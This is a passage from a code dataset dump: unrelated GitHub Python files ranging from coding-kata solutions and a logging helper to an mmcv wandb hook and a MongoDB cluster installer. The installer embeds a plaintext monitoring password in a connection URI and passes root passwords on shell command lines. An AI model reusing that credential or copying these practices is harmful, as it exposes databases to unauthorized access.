Image.open(resource_path(\"Files\\\\Logos/background.png\"))\n self.background_image = ImageTk.PhotoImage(image)\n self.c.create_image(0, 0, image = self.background_image, anchor = NW)\n \n self.overrideredirect(True)\n self.resizable(0,0)\n\n # window sizing and positioning\n window_width = 300\n window_height = 125\n scr_width = self.winfo_screenwidth()\n scr_height = self.winfo_screenheight()\n\n ctr_x = int(scr_width/2 - window_width/2)\n ctr_y = int(scr_height/2 - window_height/2)\n\n self.geometry(f'{window_width}x{window_height}+{ctr_x}+{ctr_y}')\n self.resizable(False, False)\n \n message = self.c.create_text(150, 50, text=\"Processing...\",\n fill = \"white\", font=(\"Arial\", 12, \"bold\"), width = 280, justify=CENTER)\n \n prompt = self.c.create_text(150, 72, text=\"Please Wait\",\n fill = \"white\", font=(\"Arial\", 12), width = 280, justify=CENTER)\n\n try:\n self.update()\n self.after(.1, processFile(self, label_file_explorer, saveAs, pickList))\n except:\n self.withdraw()\n showError(label_file_explorer)\n\n \n\n\n\ndef showProcessingPrompt(label_file_explorer, saveAs, pickList):\n programPrompt = promptWindow(label_file_explorer, saveAs, pickList)\n programPrompt.mainloop()\n\n\n\n\n\n\n#showPrompt(None)\n","repo_name":"tjbrasher/PurchBuilder","sub_path":"processing_prompt.py","file_name":"processing_prompt.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"1554658974","text":"'''\nhttps://www.codewars.com/kata/simple-pig-latin/train/python\n\nDifficulty: 5 kyu\n\nMove the first letter of each word to the end of it, then add \"ay\" to the end of the word. Leave punctuation marks untouched.\n\nExamples\npig_it('Pig latin is cool') # igPay atinlay siay oolcay\npig_it('Hello world !') # elloHay orldway !\n\nALGORITHMS\n'''\n\ndef pig_it(text):\n scrambled_words = \"\"\n for word in text.split():\n if word in ['!', '?']:\n scrambled_word = word + \" \"\n elif len(word) == 1:\n scrambled_word = word + \"ay \"\n else:\n scrambled_word = word[1:] + word[0] + \"ay \"\n scrambled_words += scrambled_word\n return scrambled_words[:-1]\n\n###################################################\n###################################################\n###################################################\n\n'''\nTest.assert_equals(pig_it('Pig latin is cool'),'igPay atinlay siay oolcay')\nTest.assert_equals(pig_it('This is my string'),'hisTay siay ymay tringsay')\n'''","repo_name":"khan-hasan/coding-problems","sub_path":"Python/simple_pig_latin.py","file_name":"simple_pig_latin.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"20659168013","text":"import logging\nimport sys\n\nFORMATTER = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n\nloggers = {}\n\ndef get_console_handler():\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(FORMATTER)\n return console_handler\n\ndef get_file_handler(filename):\n file_handler = logging.FileHandler(filename)\n file_handler.setFormatter(FORMATTER)\n return file_handler\n\ndef setup_custom_logger(name, filename=None, console=True, log_level=logging.DEBUG):\n if loggers.get(name):\n return loggers[name]\n\n logger = logging.getLogger(name)\n loggers[name] = logger\n\n logger.setLevel(log_level)\n\n if(not filename is None and console == True):\n logger.addHandler(get_console_handler())\n logger.addHandler(get_file_handler(filename))\n elif(not filename is None and console == False):\n logger.addHandler(get_file_handler(filename))\n else:\n logger.addHandler(get_console_handler())\n \n # with this pattern, it's rarely necessary to propagate the error up to parent\n logger.propagate = False\n\n return logger\n","repo_name":"moranelli/tradingbot","sub_path":"app/utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"20834717586","text":"import os.path as osp\n\nfrom mmcv.utils import scandir\nfrom ...dist_utils import master_only\nfrom ..hook import HOOKS\nfrom .base import LoggerHook\n\n\n@HOOKS.register_module()\nclass WandbLoggerHook(LoggerHook):\n \"\"\"Class to log metrics with wandb.\n\n It requires `wandb`_ to be installed.\n\n\n Args:\n init_kwargs (dict): A dict contains the initialization keys. Check\n https://docs.wandb.ai/ref/python/init for more init arguments.\n interval (int): Logging interval (every k iterations).\n Default 10.\n ignore_last (bool): Ignore the log of last iterations in each epoch\n if less than `interval`.\n Default: True.\n reset_flag (bool): Whether to clear the output buffer after logging.\n Default: False.\n commit (bool): Save the metrics dict to the wandb server and increment\n the step. If false ``wandb.log`` just updates the current metrics\n dict with the row argument and metrics won't be saved until\n ``wandb.log`` is called with ``commit=True``.\n Default: True.\n by_epoch (bool): Whether EpochBasedRunner is used.\n Default: True.\n with_step (bool): If True, the step will be logged from\n ``self.get_iters``. Otherwise, step will not be logged.\n Default: True.\n log_artifact (bool): If True, artifacts in {work_dir} will be uploaded\n to wandb after training ends.\n Default: True\n `New in version 1.4.3.`\n out_suffix (str or tuple[str], optional): Those filenames ending with\n ``out_suffix`` will be uploaded to wandb.\n Default: ('.log.json', '.log', '.py').\n `New in version 1.4.3.`\n\n .. _wandb:\n https://docs.wandb.ai\n \"\"\"\n\n def __init__(self,\n init_kwargs=None,\n interval=10,\n ignore_last=True,\n reset_flag=False,\n commit=True,\n by_epoch=True,\n with_step=True,\n log_artifact=True,\n out_suffix=('.log.json', '.log', '.py')):\n super(WandbLoggerHook, self).__init__(interval, ignore_last,\n reset_flag, by_epoch)\n self.import_wandb()\n self.init_kwargs = init_kwargs\n self.commit = commit\n self.with_step = with_step\n self.log_artifact = log_artifact\n self.out_suffix = out_suffix\n\n def import_wandb(self):\n try:\n import wandb\n except ImportError:\n raise ImportError(\n 'Please run \"pip install wandb\" to install wandb')\n self.wandb = wandb\n\n @master_only\n def before_run(self, runner):\n super(WandbLoggerHook, self).before_run(runner)\n if self.wandb is None:\n self.import_wandb()\n if self.init_kwargs:\n self.wandb.init(**self.init_kwargs)\n else:\n self.wandb.init()\n\n @master_only\n def log(self, runner):\n tags = self.get_loggable_tags(runner)\n if tags:\n if self.with_step:\n self.wandb.log(\n tags, step=self.get_iter(runner), commit=self.commit)\n else:\n tags['global_step'] = self.get_iter(runner)\n self.wandb.log(tags, commit=self.commit)\n\n @master_only\n def after_run(self, runner):\n if self.log_artifact:\n wandb_artifact = self.wandb.Artifact(\n name='artifacts', type='model')\n for filename in scandir(runner.work_dir, self.out_suffix, True):\n local_filepath = osp.join(runner.work_dir, filename)\n wandb_artifact.add_file(local_filepath)\n self.wandb.log_artifact(wandb_artifact)\n self.wandb.join()\n","repo_name":"jshilong/GPT4RoI","sub_path":"mmcv-1.4.7/mmcv/runner/hooks/logger/wandb.py","file_name":"wandb.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":375,"dataset":"github-code","pt":"2"} +{"seq_id":"25141872785","text":"import argparse\nimport os\nimport GraphEmbed.Config\nfrom GraphEmbed.scripts.baseUtil import get_graph_dirs, read_args, transformed_file\nfrom GraphEmbed.Config import Config\nimport sys\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Parse results.txt file and place the results in graph folder')\n parser.add_argument('--path', required=True, type=str,\n help='Path to directory containing results.txt')\n parser.add_argument('--log', action='store_false',\n help='redirect standard output to a file (default:True)')\n args = parser.parse_args()\n return args\n\n\ndef yield_results(result_file):\n with open(result_file, 'r') as rf:\n lines = rf.readlines()\n count = 0\n for i, line in enumerate(lines):\n if line.startswith(\"Input Files Path\"):\n path = (line.split(':')[1]).strip('\\n').strip()\n if line.startswith(\"no type\"):\n start_index = i\n if line.startswith(\"averaged(filter)\"):\n if count == 1:\n result = lines[start_index : i+1]\n count = 0\n yield (path, result)\n else:\n count = count + 1\n \ndef parse_results(arg_file, result_file):\n opt = read_args(arg_file)\n \n if opt['embedding_type'] in ['openne', 'transformed']:\n embed_file = os.path.join(Config.EMBEDDINGS_DIR, str(opt['dim']), opt['openne_type'], Config.EMBEDDINGS_FILE)\n if opt['embedding_type'] == 'transformed':\n embed_file = transformed_file(embed_file, opt['eval_method'])\n else:\n embed_file += '.' + opt['eval_method']\n elif opt['embedding_type'] == 'openne_openke':\n embed_file = os.path.join(Config.EMBEDDINGS_DIR, str(opt['dim']), opt['openne_type'], opt['eval_method'] + '.json')\n else:\n embed_file = os.path.join(Config.EMBEDDINGS_DIR, str(opt['dim']), opt['eval_method'] + '.json')\n \n for path, result in yield_results(result_file):\n result_file = os.path.join(path, embed_file + '.result')\n with open(result_file, 'w') as wf:\n wf.writelines(result)\n\ndef main(args):\n result_file = os.path.join(args.path, 'results.txt')\n args_file = os.path.join(args.path, Config.ARGS_FILE)\n if not os.path.exists(result_file):\n print(\"File Not Found: \", result_file)\n if not os.path.exists(args_file):\n print(\"File Not Found: \", args_file)\n \n parse_results(args_file, result_file)\n\nif __name__ == '__main__':\n args = parse_args()\n if args.log:\n sys.stdout = open(Config.LOG_FILE, 'a')\n main(args)","repo_name":"ArchitParnami/Node2KG","sub_path":"GraphEmbed/scripts/parse_results.py","file_name":"parse_results.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"73828188846","text":"class Node:\n def __init__(self, val, next):\n self.val = val\n self.next = next\n\n# 링크드 리스트 value 와 x 값을 입력 받는다.\narr = list(map(int,input().split()))\nx_value = int(input())\n\n# 링크드리스트 생성\nh = None\nfor i in range(len(arr)-1,-1,-1):\n Node(arr[i],h)\n h = Node(arr[i],h)\n\ntemp = h\nprint(\"====linked list====\")\nwhile h != None:\n if h.next != None:\n print(h.val, end = ' ')\n else:\n print(h.val)\n h = h.next\n \n# x 노드만 빼기\nh = temp\nwhile True:\n if h.next == None:\n break\n if h.next.val == x_value:\n isFind = True\n nh = h.next\n h.next = h.next.next\n nh.next = None\n break\n h = h.next\n\n# x 노드 기준으로 작으면 왼쪽 크거나 같으면 오른쪽으로 노드들을 붙이기\nnt = nh\nwhile temp != None:\n next_node = temp.next\n if temp.val < x_value:\n temp.next = nh\n nh = temp\n else:\n nt.next = temp\n nt = temp\n nt.next = None\n temp = next_node\n\n# 새로운 링크드 리스트 출력.\nprint(\"====New linked list====\")\nwhile nh != None:\n if nh.next != None:\n print(nh.val, end = ' ')\n else:\n print(nh.val)\n nh = nh.next\n\n# 테스트 코드\n# 4 3 2 6\n# 3\n\n\n# 4 3 1 5 6 7 8 9\n# 6\n\n\n# 1 1 1 3 3 3 2 2 2 4 4\n# 3\n\n# 3 3 3 3 1\n# 1","repo_name":"Jeoungseungho/python-coding-study","sub_path":"김인호/(링크드리스트)책_2-4.py/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"ko","doc_type":"code","stars":8,"dataset":"github-code","pt":"2"} +{"seq_id":"70458578928","text":"# deletes jpg files without matching annotation txt files and vice versa\r\n\r\nimport os, glob\r\n\r\ntxt_dataset_path = \"D:\\\\Datasets\\\\Object_Detection_and_Classification_Only_Damages_YOLO\\\\labels\\\\\" \r\nimgs_dataset_path = \"D:\\\\Datasets\\\\Object_Detection_and_Classification_Only_Damages_YOLO\\\\images\\\\\" \r\n\r\ntxt_paths = glob.glob(os.path.join(txt_dataset_path, \"*.txt\"))\r\njpg_paths = glob.glob(os.path.join(imgs_dataset_path, \"*.jpg\"))\r\n\r\nto_del = []\r\n\r\n# img file not annotated, e.g. img is filtered out\r\ntxt_files = [txt_file.split(os.sep)[-1].split(\".\")[0] for txt_file in txt_paths]\r\nfor jpg_file in jpg_paths:\r\n eq_txt = jpg_file.split(os.sep)[-1].split(\".\")[0]\r\n if eq_txt not in txt_files:\r\n to_del.append(jpg_file)\r\n\r\n# annotation for non existant img\r\njpg_files = [jpg_file.split(os.sep)[-1].split(\".\")[0] for jpg_file in jpg_paths]\r\nfor txt_file in txt_paths:\r\n eq_jpg = txt_file.split(os.sep)[-1].split(\".\")[0]\r\n if eq_jpg not in jpg_files:\r\n to_del.append(txt_file)\r\n\r\n# no new labels / empty file\r\nfor txt_file in txt_paths:\r\n with open(txt_file, 'r') as txt_file_content:\r\n if len(str(txt_file_content.read()))<5:\r\n to_del.append(txt_file)\r\n\r\nprint(f\"deleting {len(to_del)} files\")\r\nfor file in to_del:\r\n os.remove(file)\r\n\r\n# use while next with 2 pointers instead => O(n)","repo_name":"MaherDissem/Data-Manipulation-Scripts","sub_path":"clean_yolo_folder.py","file_name":"clean_yolo_folder.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74207613167","text":"# coding:utf-8\nfrom main.run import Run\n\nclass HomeCase:\n def __init__(self):\n self.json_file = \"/Users/mac/Desktop/测试资料/蜗牛家产品线/woniujia_cc_jiekou/woniujia_cc_jiekou_git/woniujia_cc_project/dataconfig/request_pram.json\"\n self.sheet_name = \"首页模块\"\n self.sheet_id = 1\n self.sql_base = \"effect20190628\"\n\n def go_run_home(self):\n # run_comm = RunCommon(self.json_file, self.sheet_name, self.sheet_id)\n # run_comm.go_run_case()\n run = Run(self.json_file, self.sheet_name, self.sheet_id, self.sql_base)\n run.go_to_run()\n\nif __name__ == '__main__':\n homecase = HomeCase()\n homecase.go_run_home()","repo_name":"GorkyZH/woniujia_cc_jiekou","sub_path":"woniujia_cc_project/case/home_case.py","file_name":"home_case.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"3030874485","text":"#!/usr/bin/env python\n\nimport os\nimport numpy as np\nfrom filterpicker import filterpicker as FP\n\nmoduledir = os.path.dirname(FP.__file__)\nfpp = FP.FilterPicker(0.008, np.loadtxt(moduledir + '/tests/fg_sac.npa'),\n filter_window=1.6, longterm_window=3.2, t_up=0.16,\n threshold_1=20, threshold_2=10)\npidx, punc, pfrq = fpp.run()\nprint(pidx, punc, pfrq)\nfpp.plot()\n","repo_name":"mbagagli/filterpicker","sub_path":"examples_tests/fp_script.py","file_name":"fp_script.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"2"} +{"seq_id":"42110452045","text":"def getBit(M, i):\n if int(M,2) & (1<= self.mongoss:\n self.host_roles['db'] = [self.createdb[i:i + self.replicas] for i in range(0,\n (self.replicas) * self.nodegroups, self.replicas)]\n self.host_roles['config'] = self.createdb[self.replicas *\n self.nodegroups:self.replicas * self.nodegroups + self.configs:]\n self.host_roles['mongos'] = self.createdb[self.replicas * self.nodegroups + self.configs::]\n else:\n logger.error(\"mongodb服务地址的个数未达到设置的数量,请查看配置\")\n elif self.replication_mode:\n if len(self.createdb) > 0:\n self.host_roles['db'] = [ self.createdb ]\n self.host_roles['config'] = []\n self.host_roles['mongos'] = []\n else:\n logger.error(\"未添加mongodb服务地址\")\n\n def init_db(self, grouphosts, groups):\n logger.info(\"修改mongo.conf文件\")\n with open('/root/mongo-pkg/mongo.conf-default', 'r', encoding='utf-8') as fr:\n mongo_yaml = yaml.safe_load(fr)\n mongo_yaml['systemLog']['path'] = f\"{self.cnfdir}/mongo.log\"\n mongo_yaml['processManagement']['pidFilePath'] = f\"{self.cnfdir}/mongo.pid\"\n mongo_yaml['net']['port'] = self.mongoport\n mongo_yaml['net']['unixDomainSocket']['pathPrefix'] = self.cnfdir\n mongo_yaml['storage']['dbPath'] = self.datadir\n if self.mongocachesize:\n mongo_yaml['storage']['wiredTiger']['engineConfig']['cacheSizeGB'] = self.mongocachesize\n else:\n mongo_yaml['storage']['wiredTiger']['engineConfig']['cacheSizeGB'] = cachesize\n mongo_yaml['replication']['oplogSizeMB'] = str(sizemb)\n if self.cluster_mode:\n mongo_yaml['replication']['replSetName'] = f'{self.mongoreplname}-shard0{groups}'\n mongo_yaml['sharding'] = {}\n mongo_yaml['sharding']['clusterRole'] = 'shardsvr'\n else:\n mongo_yaml['replication']['replSetName'] = self.mongoreplname\n if not grouphosts.index(f'{ip}:{self.mongoport}') == 0 and f'{ip}:{self.mongoport}' in grouphosts:\n mongo_yaml['security'] = {}\n mongo_yaml['security']['keyFile'] = f'{self.perfix}/mongodb-keyfile'\n mongo_yaml['security']['authorization'] = 'enabled'\n with open(f'{self.cnfdir}/mongo.conf', 'w+', encoding='utf-8') as fw:\n yaml.safe_dump(mongo_yaml, fw)\n logger.info(\"创建用户和文件授权\")\n subprocess.call(\"useradd -M -s /sbin/nologin mongo\", shell=True)\n subprocess.call(\"chown -R mongo.mongo {0}\".format(self.perfix), shell=True)\n logger.info(\"启动数据库\")\n subprocess.call(\"sudo -u mongo /usr/bin/numactl --interleave=all {0}/bin/mongod -f {1}/mongo.conf\"\n .format(self.perfix, self.cnfdir), shell=True)\n\n def init_config(self, grouphosts):\n logger.info(\"修改config.conf文件\")\n with open('/root/mongo-pkg/config.conf-default', 'r') as fr:\n config_yaml = yaml.safe_load(fr)\n config_yaml['systemLog']['path'] = f\"{self.cnfdir}/config.log\"\n config_yaml['processManagement']['pidFilePath'] = f\"{self.cnfdir}/config.pid\"\n config_yaml['net']['port'] = self.mongoport\n config_yaml['net']['unixDomainSocket']['pathPrefix'] = self.cnfdir\n config_yaml['storage']['dbPath'] = self.datadir\n if self.mongocachesize:\n config_yaml['storage']['wiredTiger']['engineConfig']['cacheSizeGB'] = self.mongocachesize\n else:\n config_yaml['storage']['wiredTiger']['engineConfig']['cacheSizeGB'] = cachesize\n config_yaml['replication']['oplogSizeMB'] = sizemb\n config_yaml['replication']['replSetName'] = f'{self.mongoreplname}-configs'\n config_yaml['sharding']['clusterRole'] = 'configsvr'\n if not grouphosts.index(f'{ip}:{self.mongoport}') == 0:\n config_yaml['security'] = {}\n config_yaml['security']['keyFile'] = f'{self.perfix}/mongodb-keyfile'\n config_yaml['security']['authorization'] = 'enabled'\n with open(f'{self.cnfdir}/config.conf', 'w+', encoding='utf-8') as fw:\n yaml.safe_dump(config_yaml, fw)\n logger.info(\"创建用户和文件授权\")\n subprocess.call(\"useradd -M -s /sbin/nologin mongo\", shell=True)\n subprocess.call(\"chown -R mongo.mongo {0}\".format(self.perfix), shell=True)\n logger.info(\"启动数据库\")\n subprocess.call(\"sudo -u mongo /usr/bin/numactl --interleave=all {0}/bin/mongod -f {1}/config.conf\"\n .format(self.perfix, self.cnfdir), shell=True)\n\n def init_mongos(self, grouphosts):\n #这里的grouphosts的指config的地址,需要写到配置文件中,详情参考mongos的配置文档\n logger.info(\"修改mongos.conf文件\")\n with open('/root/mongo-pkg/mongos.conf-default', 'r') as fr:\n mongos_yaml = yaml.safe_load(fr)\n mongos_yaml['systemLog']['path'] = f\"{self.cnfdir}/mongos.log\"\n mongos_yaml['processManagement']['pidFilePath'] = f\"{self.cnfdir}/mongos.pid\"\n mongos_yaml['net']['port'] = self.mongoport\n mongos_yaml['net']['unixDomainSocket']['pathPrefix'] = f\"{self.cnfdir}\"\n hosts = ','.join(grouphosts)\n mongos_yaml['sharding']['configDB'] = f\"{self.mongoreplname}-configs/{hosts}\"\n mongos_yaml['security'] = {}\n mongos_yaml['security']['keyFile'] = f'{self.perfix}/mongodb-keyfile'\n with open(f'{self.cnfdir}/mongos.conf', 'w+', encoding='utf-8') as fw:\n yaml.safe_dump(mongos_yaml, fw)\n logger.info(\"创建用户和文件授权\")\n subprocess.call(\"useradd -M -s /sbin/nologin mongo\", shell=True)\n subprocess.call(\"chown -R mongo.mongo {0}\".format(self.perfix), shell=True)\n logger.info(\"启动数据库\")\n subprocess.call(\"sudo -u mongo /usr/bin/numactl --interleave=all {0}/bin/mongos -f {1}/mongos.conf\"\n .format(self.perfix, self.cnfdir), shell=True)\n if not os.path.exists(\"/usr/bin/mongo\"):\n os.symlink(f\"{self.perfix}/bin/mongo\", \"/usr/bin/mongo\")\n\n def create_pk_db(self, grouphosts, groups):\n if grouphosts.index(f'{ip}:{self.mongoport}') == 0:\n logger.info(\"初始化集群分片信息\")\n logger.debug(f\"集群成员:{grouphosts}, 集群名称:{self.mongoreplname}\")\n usertext = \"db.createUser({ user: 'root', pwd: '****', roles: [ { role: 'root', db: 'admin'} ]})\"\n if self.cluster_mode:\n config = {'_id': f'{self.mongoreplname}-shard0{groups}', 'members': [{'_id': 0, 'host': grouphosts[0]}]}\n else:\n config = {'_id': self.mongoreplname, 'members': [{'_id': 0, 'host': grouphosts[0]}]}\n subprocess.call(f\"echo \\\"rs.initiate({config})\\nsleep(5000)\\n{usertext}\\ndb.shutdownServer()\\\" | \\\n {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin\", shell=True)\n logger.info(\"重启添加配置文件\")\n with open(f'{self.cnfdir}/mongo.conf', 'r') as fr:\n mongo_yaml = yaml.safe_load(fr)\n mongo_yaml['security'] = {}\n mongo_yaml['security']['keyFile'] = f'{self.perfix}/mongodb-keyfile'\n mongo_yaml['security']['authorization'] = 'enabled'\n with open(f'{self.cnfdir}/mongo.conf', 'w+', encoding='utf-8') as fw:\n yaml.safe_dump(mongo_yaml, fw)\n subprocess.call(\"sudo -u mongo /usr/bin/numactl --interleave=all {0}/bin/mongod -f {1}/mongo.conf\"\n .format(self.perfix, self.cnfdir), shell=True)\n logger.info(\"添加机器到副本集中\")\n for _ in range(60):\n if not False in [ self.check_port(i) for i in grouphosts ]:\n for z in grouphosts[1::]:\n logger.debug(f\"添加机器:{z}\")\n subprocess.call(f\"echo \\\"rs.add('{z}')\\\" | {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin \\\n -uroot -p****\", shell=True)\n subprocess.call(f\"{self.perfix}/bin/mongorestore --host 127.0.0.1 --port {self.mongoport} -uroot\\\n -p**** --archive=/root/mongo-pkg/user.arch\", shell=True)\n subprocess.call(f\"echo \\\"db.dropUser('root')\\\" | \\\n {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin -uroot -p****\", shell=True)\n break\n else:\n time.sleep(3)\n\n def create_pk_config(self, grouphosts):\n if grouphosts.index(f'{ip}:{self.mongoport}') == 0:\n logger.info(\"初始化集群配置服信息\")\n logger.debug(f\"集群成员:{grouphosts}\")\n usertext = \"db.createUser({ user: 'root', pwd: '****', roles: [ { role: 'root', db: 'admin'} ]})\"\n config = {'_id': f'{self.mongoreplname}-configs', 'members': [{'_id': 0, 'host': grouphosts[0]}]}\n subprocess.call(f\"echo \\\"rs.initiate({config})\\nsleep(5000)\\n{usertext}\\ndb.shutdownServer()\\\" | \\\n {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin\", shell=True)\n logger.info(\"重启添加配置文件\")\n with open(f'{self.cnfdir}/config.conf', 'r') as fr:\n config_yaml = yaml.safe_load(fr)\n config_yaml['security'] = {}\n config_yaml['security']['keyFile'] = f'{self.perfix}/mongodb-keyfile'\n config_yaml['security']['authorization'] = 'enabled'\n with open(f'{self.cnfdir}/config.conf', 'w+', encoding='utf-8') as fw:\n yaml.safe_dump(config_yaml, fw)\n subprocess.call(\"sudo -u mongo /usr/bin/numactl --interleave=all {0}/bin/mongod -f {1}/config.conf\"\n .format(self.perfix, self.cnfdir), shell=True)\n logger.info(\"添加机器到副本集中\")\n for _ in range(60):\n if not False in [ self.check_port(i) for i in grouphosts ]:\n for z in grouphosts[1::]:\n logger.debug(f\"添加机器:{z}\")\n subprocess.call(f\"echo \\\"rs.add('{z}')\\\" | {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin \\\n -uroot -p****\", shell=True)\n break\n else:\n time.sleep(3)\n\n def create_pk_mongos(self, grouphosts):\n #grouphosts只指mongos的机器,与init不同\n if grouphosts.index(f'{ip}:{self.mongoport}') == 0:\n logger.info(\"初始化集群路由信息\")\n logger.debug(f\"集群成员:{grouphosts}\")\n for w in range(60):\n if not False in [ self.check_port(i) for i in self.createdb ]:\n for x,y in enumerate(self.host_roles['db']):\n config = ','.join(y)\n subprocess.call(f\"echo \\\"sh.addShard('{self.mongoreplname}-shard0{x}/{config}')\\\" |\\\n {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin -uroot -p****\", shell=True)\n subprocess.call(f\"{self.perfix}/bin/mongorestore --host 127.0.0.1 --port {self.mongoport} -uroot\\\n -p**** --archive=/root/mongo-pkg/user.arch\", shell=True)\n subprocess.call(f\"echo \\\"db.dropUser('root')\\\" | \\\n {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin -uroot -p****\", shell=True)\n break\n else:\n if w == 59:\n logger.error(\"请检查集群所有成员状态是否正常\")\n else:\n time.sleep(3)\n\n def deploy_env(self):\n global cachesize, sizemb\n cachesize = int(psutil.virtual_memory().total / 1024 / 1024 / 1024 * 0.7)\n sizemb = round(psutil.disk_usage(f'{self.perfix}').total / 1024 / 1024 / 1024 * 0.05) * 1024\n if not os.path.exists(os.path.join(self.perfix, 'mongodb-keyfile')):\n shutil.copy('/root/mongo-pkg/mongodb-keyfile', self.perfix)\n subprocess.call(f\"chmod 400 {self.perfix}/mongodb-keyfile\", shell=True)\n shutil.copy('/root/mongo-pkg/mongod_service.sh', self.perfix)\n self.sorted_hosts()\n dbs = [ i for i,x in enumerate(self.host_roles['db']) if f'{ip}:{self.mongoport}' in x ]\n if f'{ip}:{self.mongoport}' in self.host_roles['config']:\n self.init_config(self.host_roles['config'])\n self.create_pk_config(self.host_roles['config'])\n self.init_monitor(self.host_roles['config'])\n elif f'{ip}:{self.mongoport}' in self.host_roles['mongos']:\n self.init_mongos(self.host_roles['config'])\n self.create_pk_mongos(self.host_roles['mongos'])\n self.init_backup(self.host_roles['mongos'])\n else:\n if dbs:\n self.init_db(self.host_roles['db'][dbs[0]], dbs[0])\n self.create_pk_db(self.host_roles['db'][dbs[0]], dbs[0])\n self.init_monitor(self.host_roles['db'][dbs[0]])\n if not os.path.exists(\"/usr/bin/mongo\"):\n os.symlink(f\"{self.perfix}/bin/mongo\", \"/usr/bin/mongo\")\n\n def init_backup(self, grouphosts):\n if not self.skip_backups and f\"{ip}:{self.mongoport}\" == grouphosts[-1]:\n logger.info(\"添加mongodb备份\")\n shutil.copy('/root/mongo-pkg/backup.py', self.perfix)\n if self.uploadtype == 'minio':\n shutil.copy('/root/mongo-pkg/upload-minio.py', '/usr/games/upload.py')\n elif self.uploadtype == 'ali':\n shutil.copy('/root/mongo-pkg/upload-ali.py', '/usr/games/upload.py')\n elif self.uploadtype == 'aws':\n subprocess.call(\"pip3 install boto3\", shell=True)\n shutil.copy('/root/mongo-pkg/upload-aws.py', '/usr/games/upload.py')\n subprocess.call(\"chmod +x /usr/games/upload.py\", shell=True)\n if self.uploadtype == 'local':\n clearday = 5\n upcycle = 0\n else:\n clearday = 3\n upcycle = 1\n my_cron = CronTab(user='root')\n iter = list(my_cron.find_command(re.compile(f\"127.0.0.1 (.*) {self.mongoport}\")))\n if not iter:\n command = (f\"/usr/bin/python3 {self.perfix}/backup.py --host 127.0.0.1 --port {self.mongoport} \"\n f\"--clearday {clearday} --upcycle {upcycle}\")\n job = my_cron.new(command=command)\n job.set_comment(\"mongo数据备份\")\n job.setall('00 04 * * *')\n my_cron.write()\n\n def init_monitor(self, grouphosts):\n logger.info(\"安装mongodb_exporter\")\n if not os.path.exists('/usr/bin/mongodb_exporter'):\n shutil.copy('/root/mongo-pkg/mongodb_exporter', '/usr/bin')\n if not self.skip_monitors and f\"{ip}:{self.mongoport}\" == grouphosts[-1]:\n cfg2 = ConfigParser()\n if not os.path.exists('/etc/supervisord.d'):\n os.makedirs('/etc/supervisord.d')\n if not os.path.exists('/etc/supervisord.d/supervisord.conf'):\n cfg2.read('/root/mongo-pkg/supervisord.conf')\n else:\n cfg2.read('/etc/supervisord.d/supervisord.conf')\n urls = ','.join(grouphosts)\n mongourl = f\"mongodb://monitoruser:oA4Pl5Usgr1sc@{urls}\"\n cfg2[f'program:mongo_export{self.mongoport}'] = {}\n cfg2.set(f'program:mongo_export{self.mongoport}', 'command',\n f'/usr/bin/mongodb_exporter --mongodb.uri={mongourl}')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'autostart', 'true')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'startsecs', '10')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'autorestart', 'true')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'startretries', '3')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'user', 'mongo')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'priority', '999')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'redirect_stderr', 'true')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'stdout_logfile_maxbytes', '20MB')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'stdout_logfile_backups', '20')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'stdout_logfile', f'{self.cnfdir}/monitor.log')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'stopasgroup', 'false')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'killasgroup', 'false')\n with open('/etc/supervisord.d/supervisord.conf', 'w+') as fw2:\n cfg2.write(fw2)\n if os.path.exists('/etc/supervisord.d/supervisord.pid'):\n subprocess.call(\"/usr/local/bin/supervisorctl -c /etc/supervisord.d/supervisord.conf reload\", shell=True)\n else:\n subprocess.call(\"/usr/local/bin/supervisord -c /etc/supervisord.d/supervisord.conf\", shell=True)\n\n def main(self):\n self.sorted_hosts()\n logger.debug(f\"主机列表:{self.createdb}\")\n if f\"{ip}:{self.mongoport}\" in self.createdb:\n self.minio_get()\n self.deploy_env()\n else:\n logger.error(\"找不到主机\")\n\nif __name__ == '__main__':\n logger.add(f'/tmp/install_mongodb.log', level='DEBUG',\n format='{time:YYYY-MM-DD
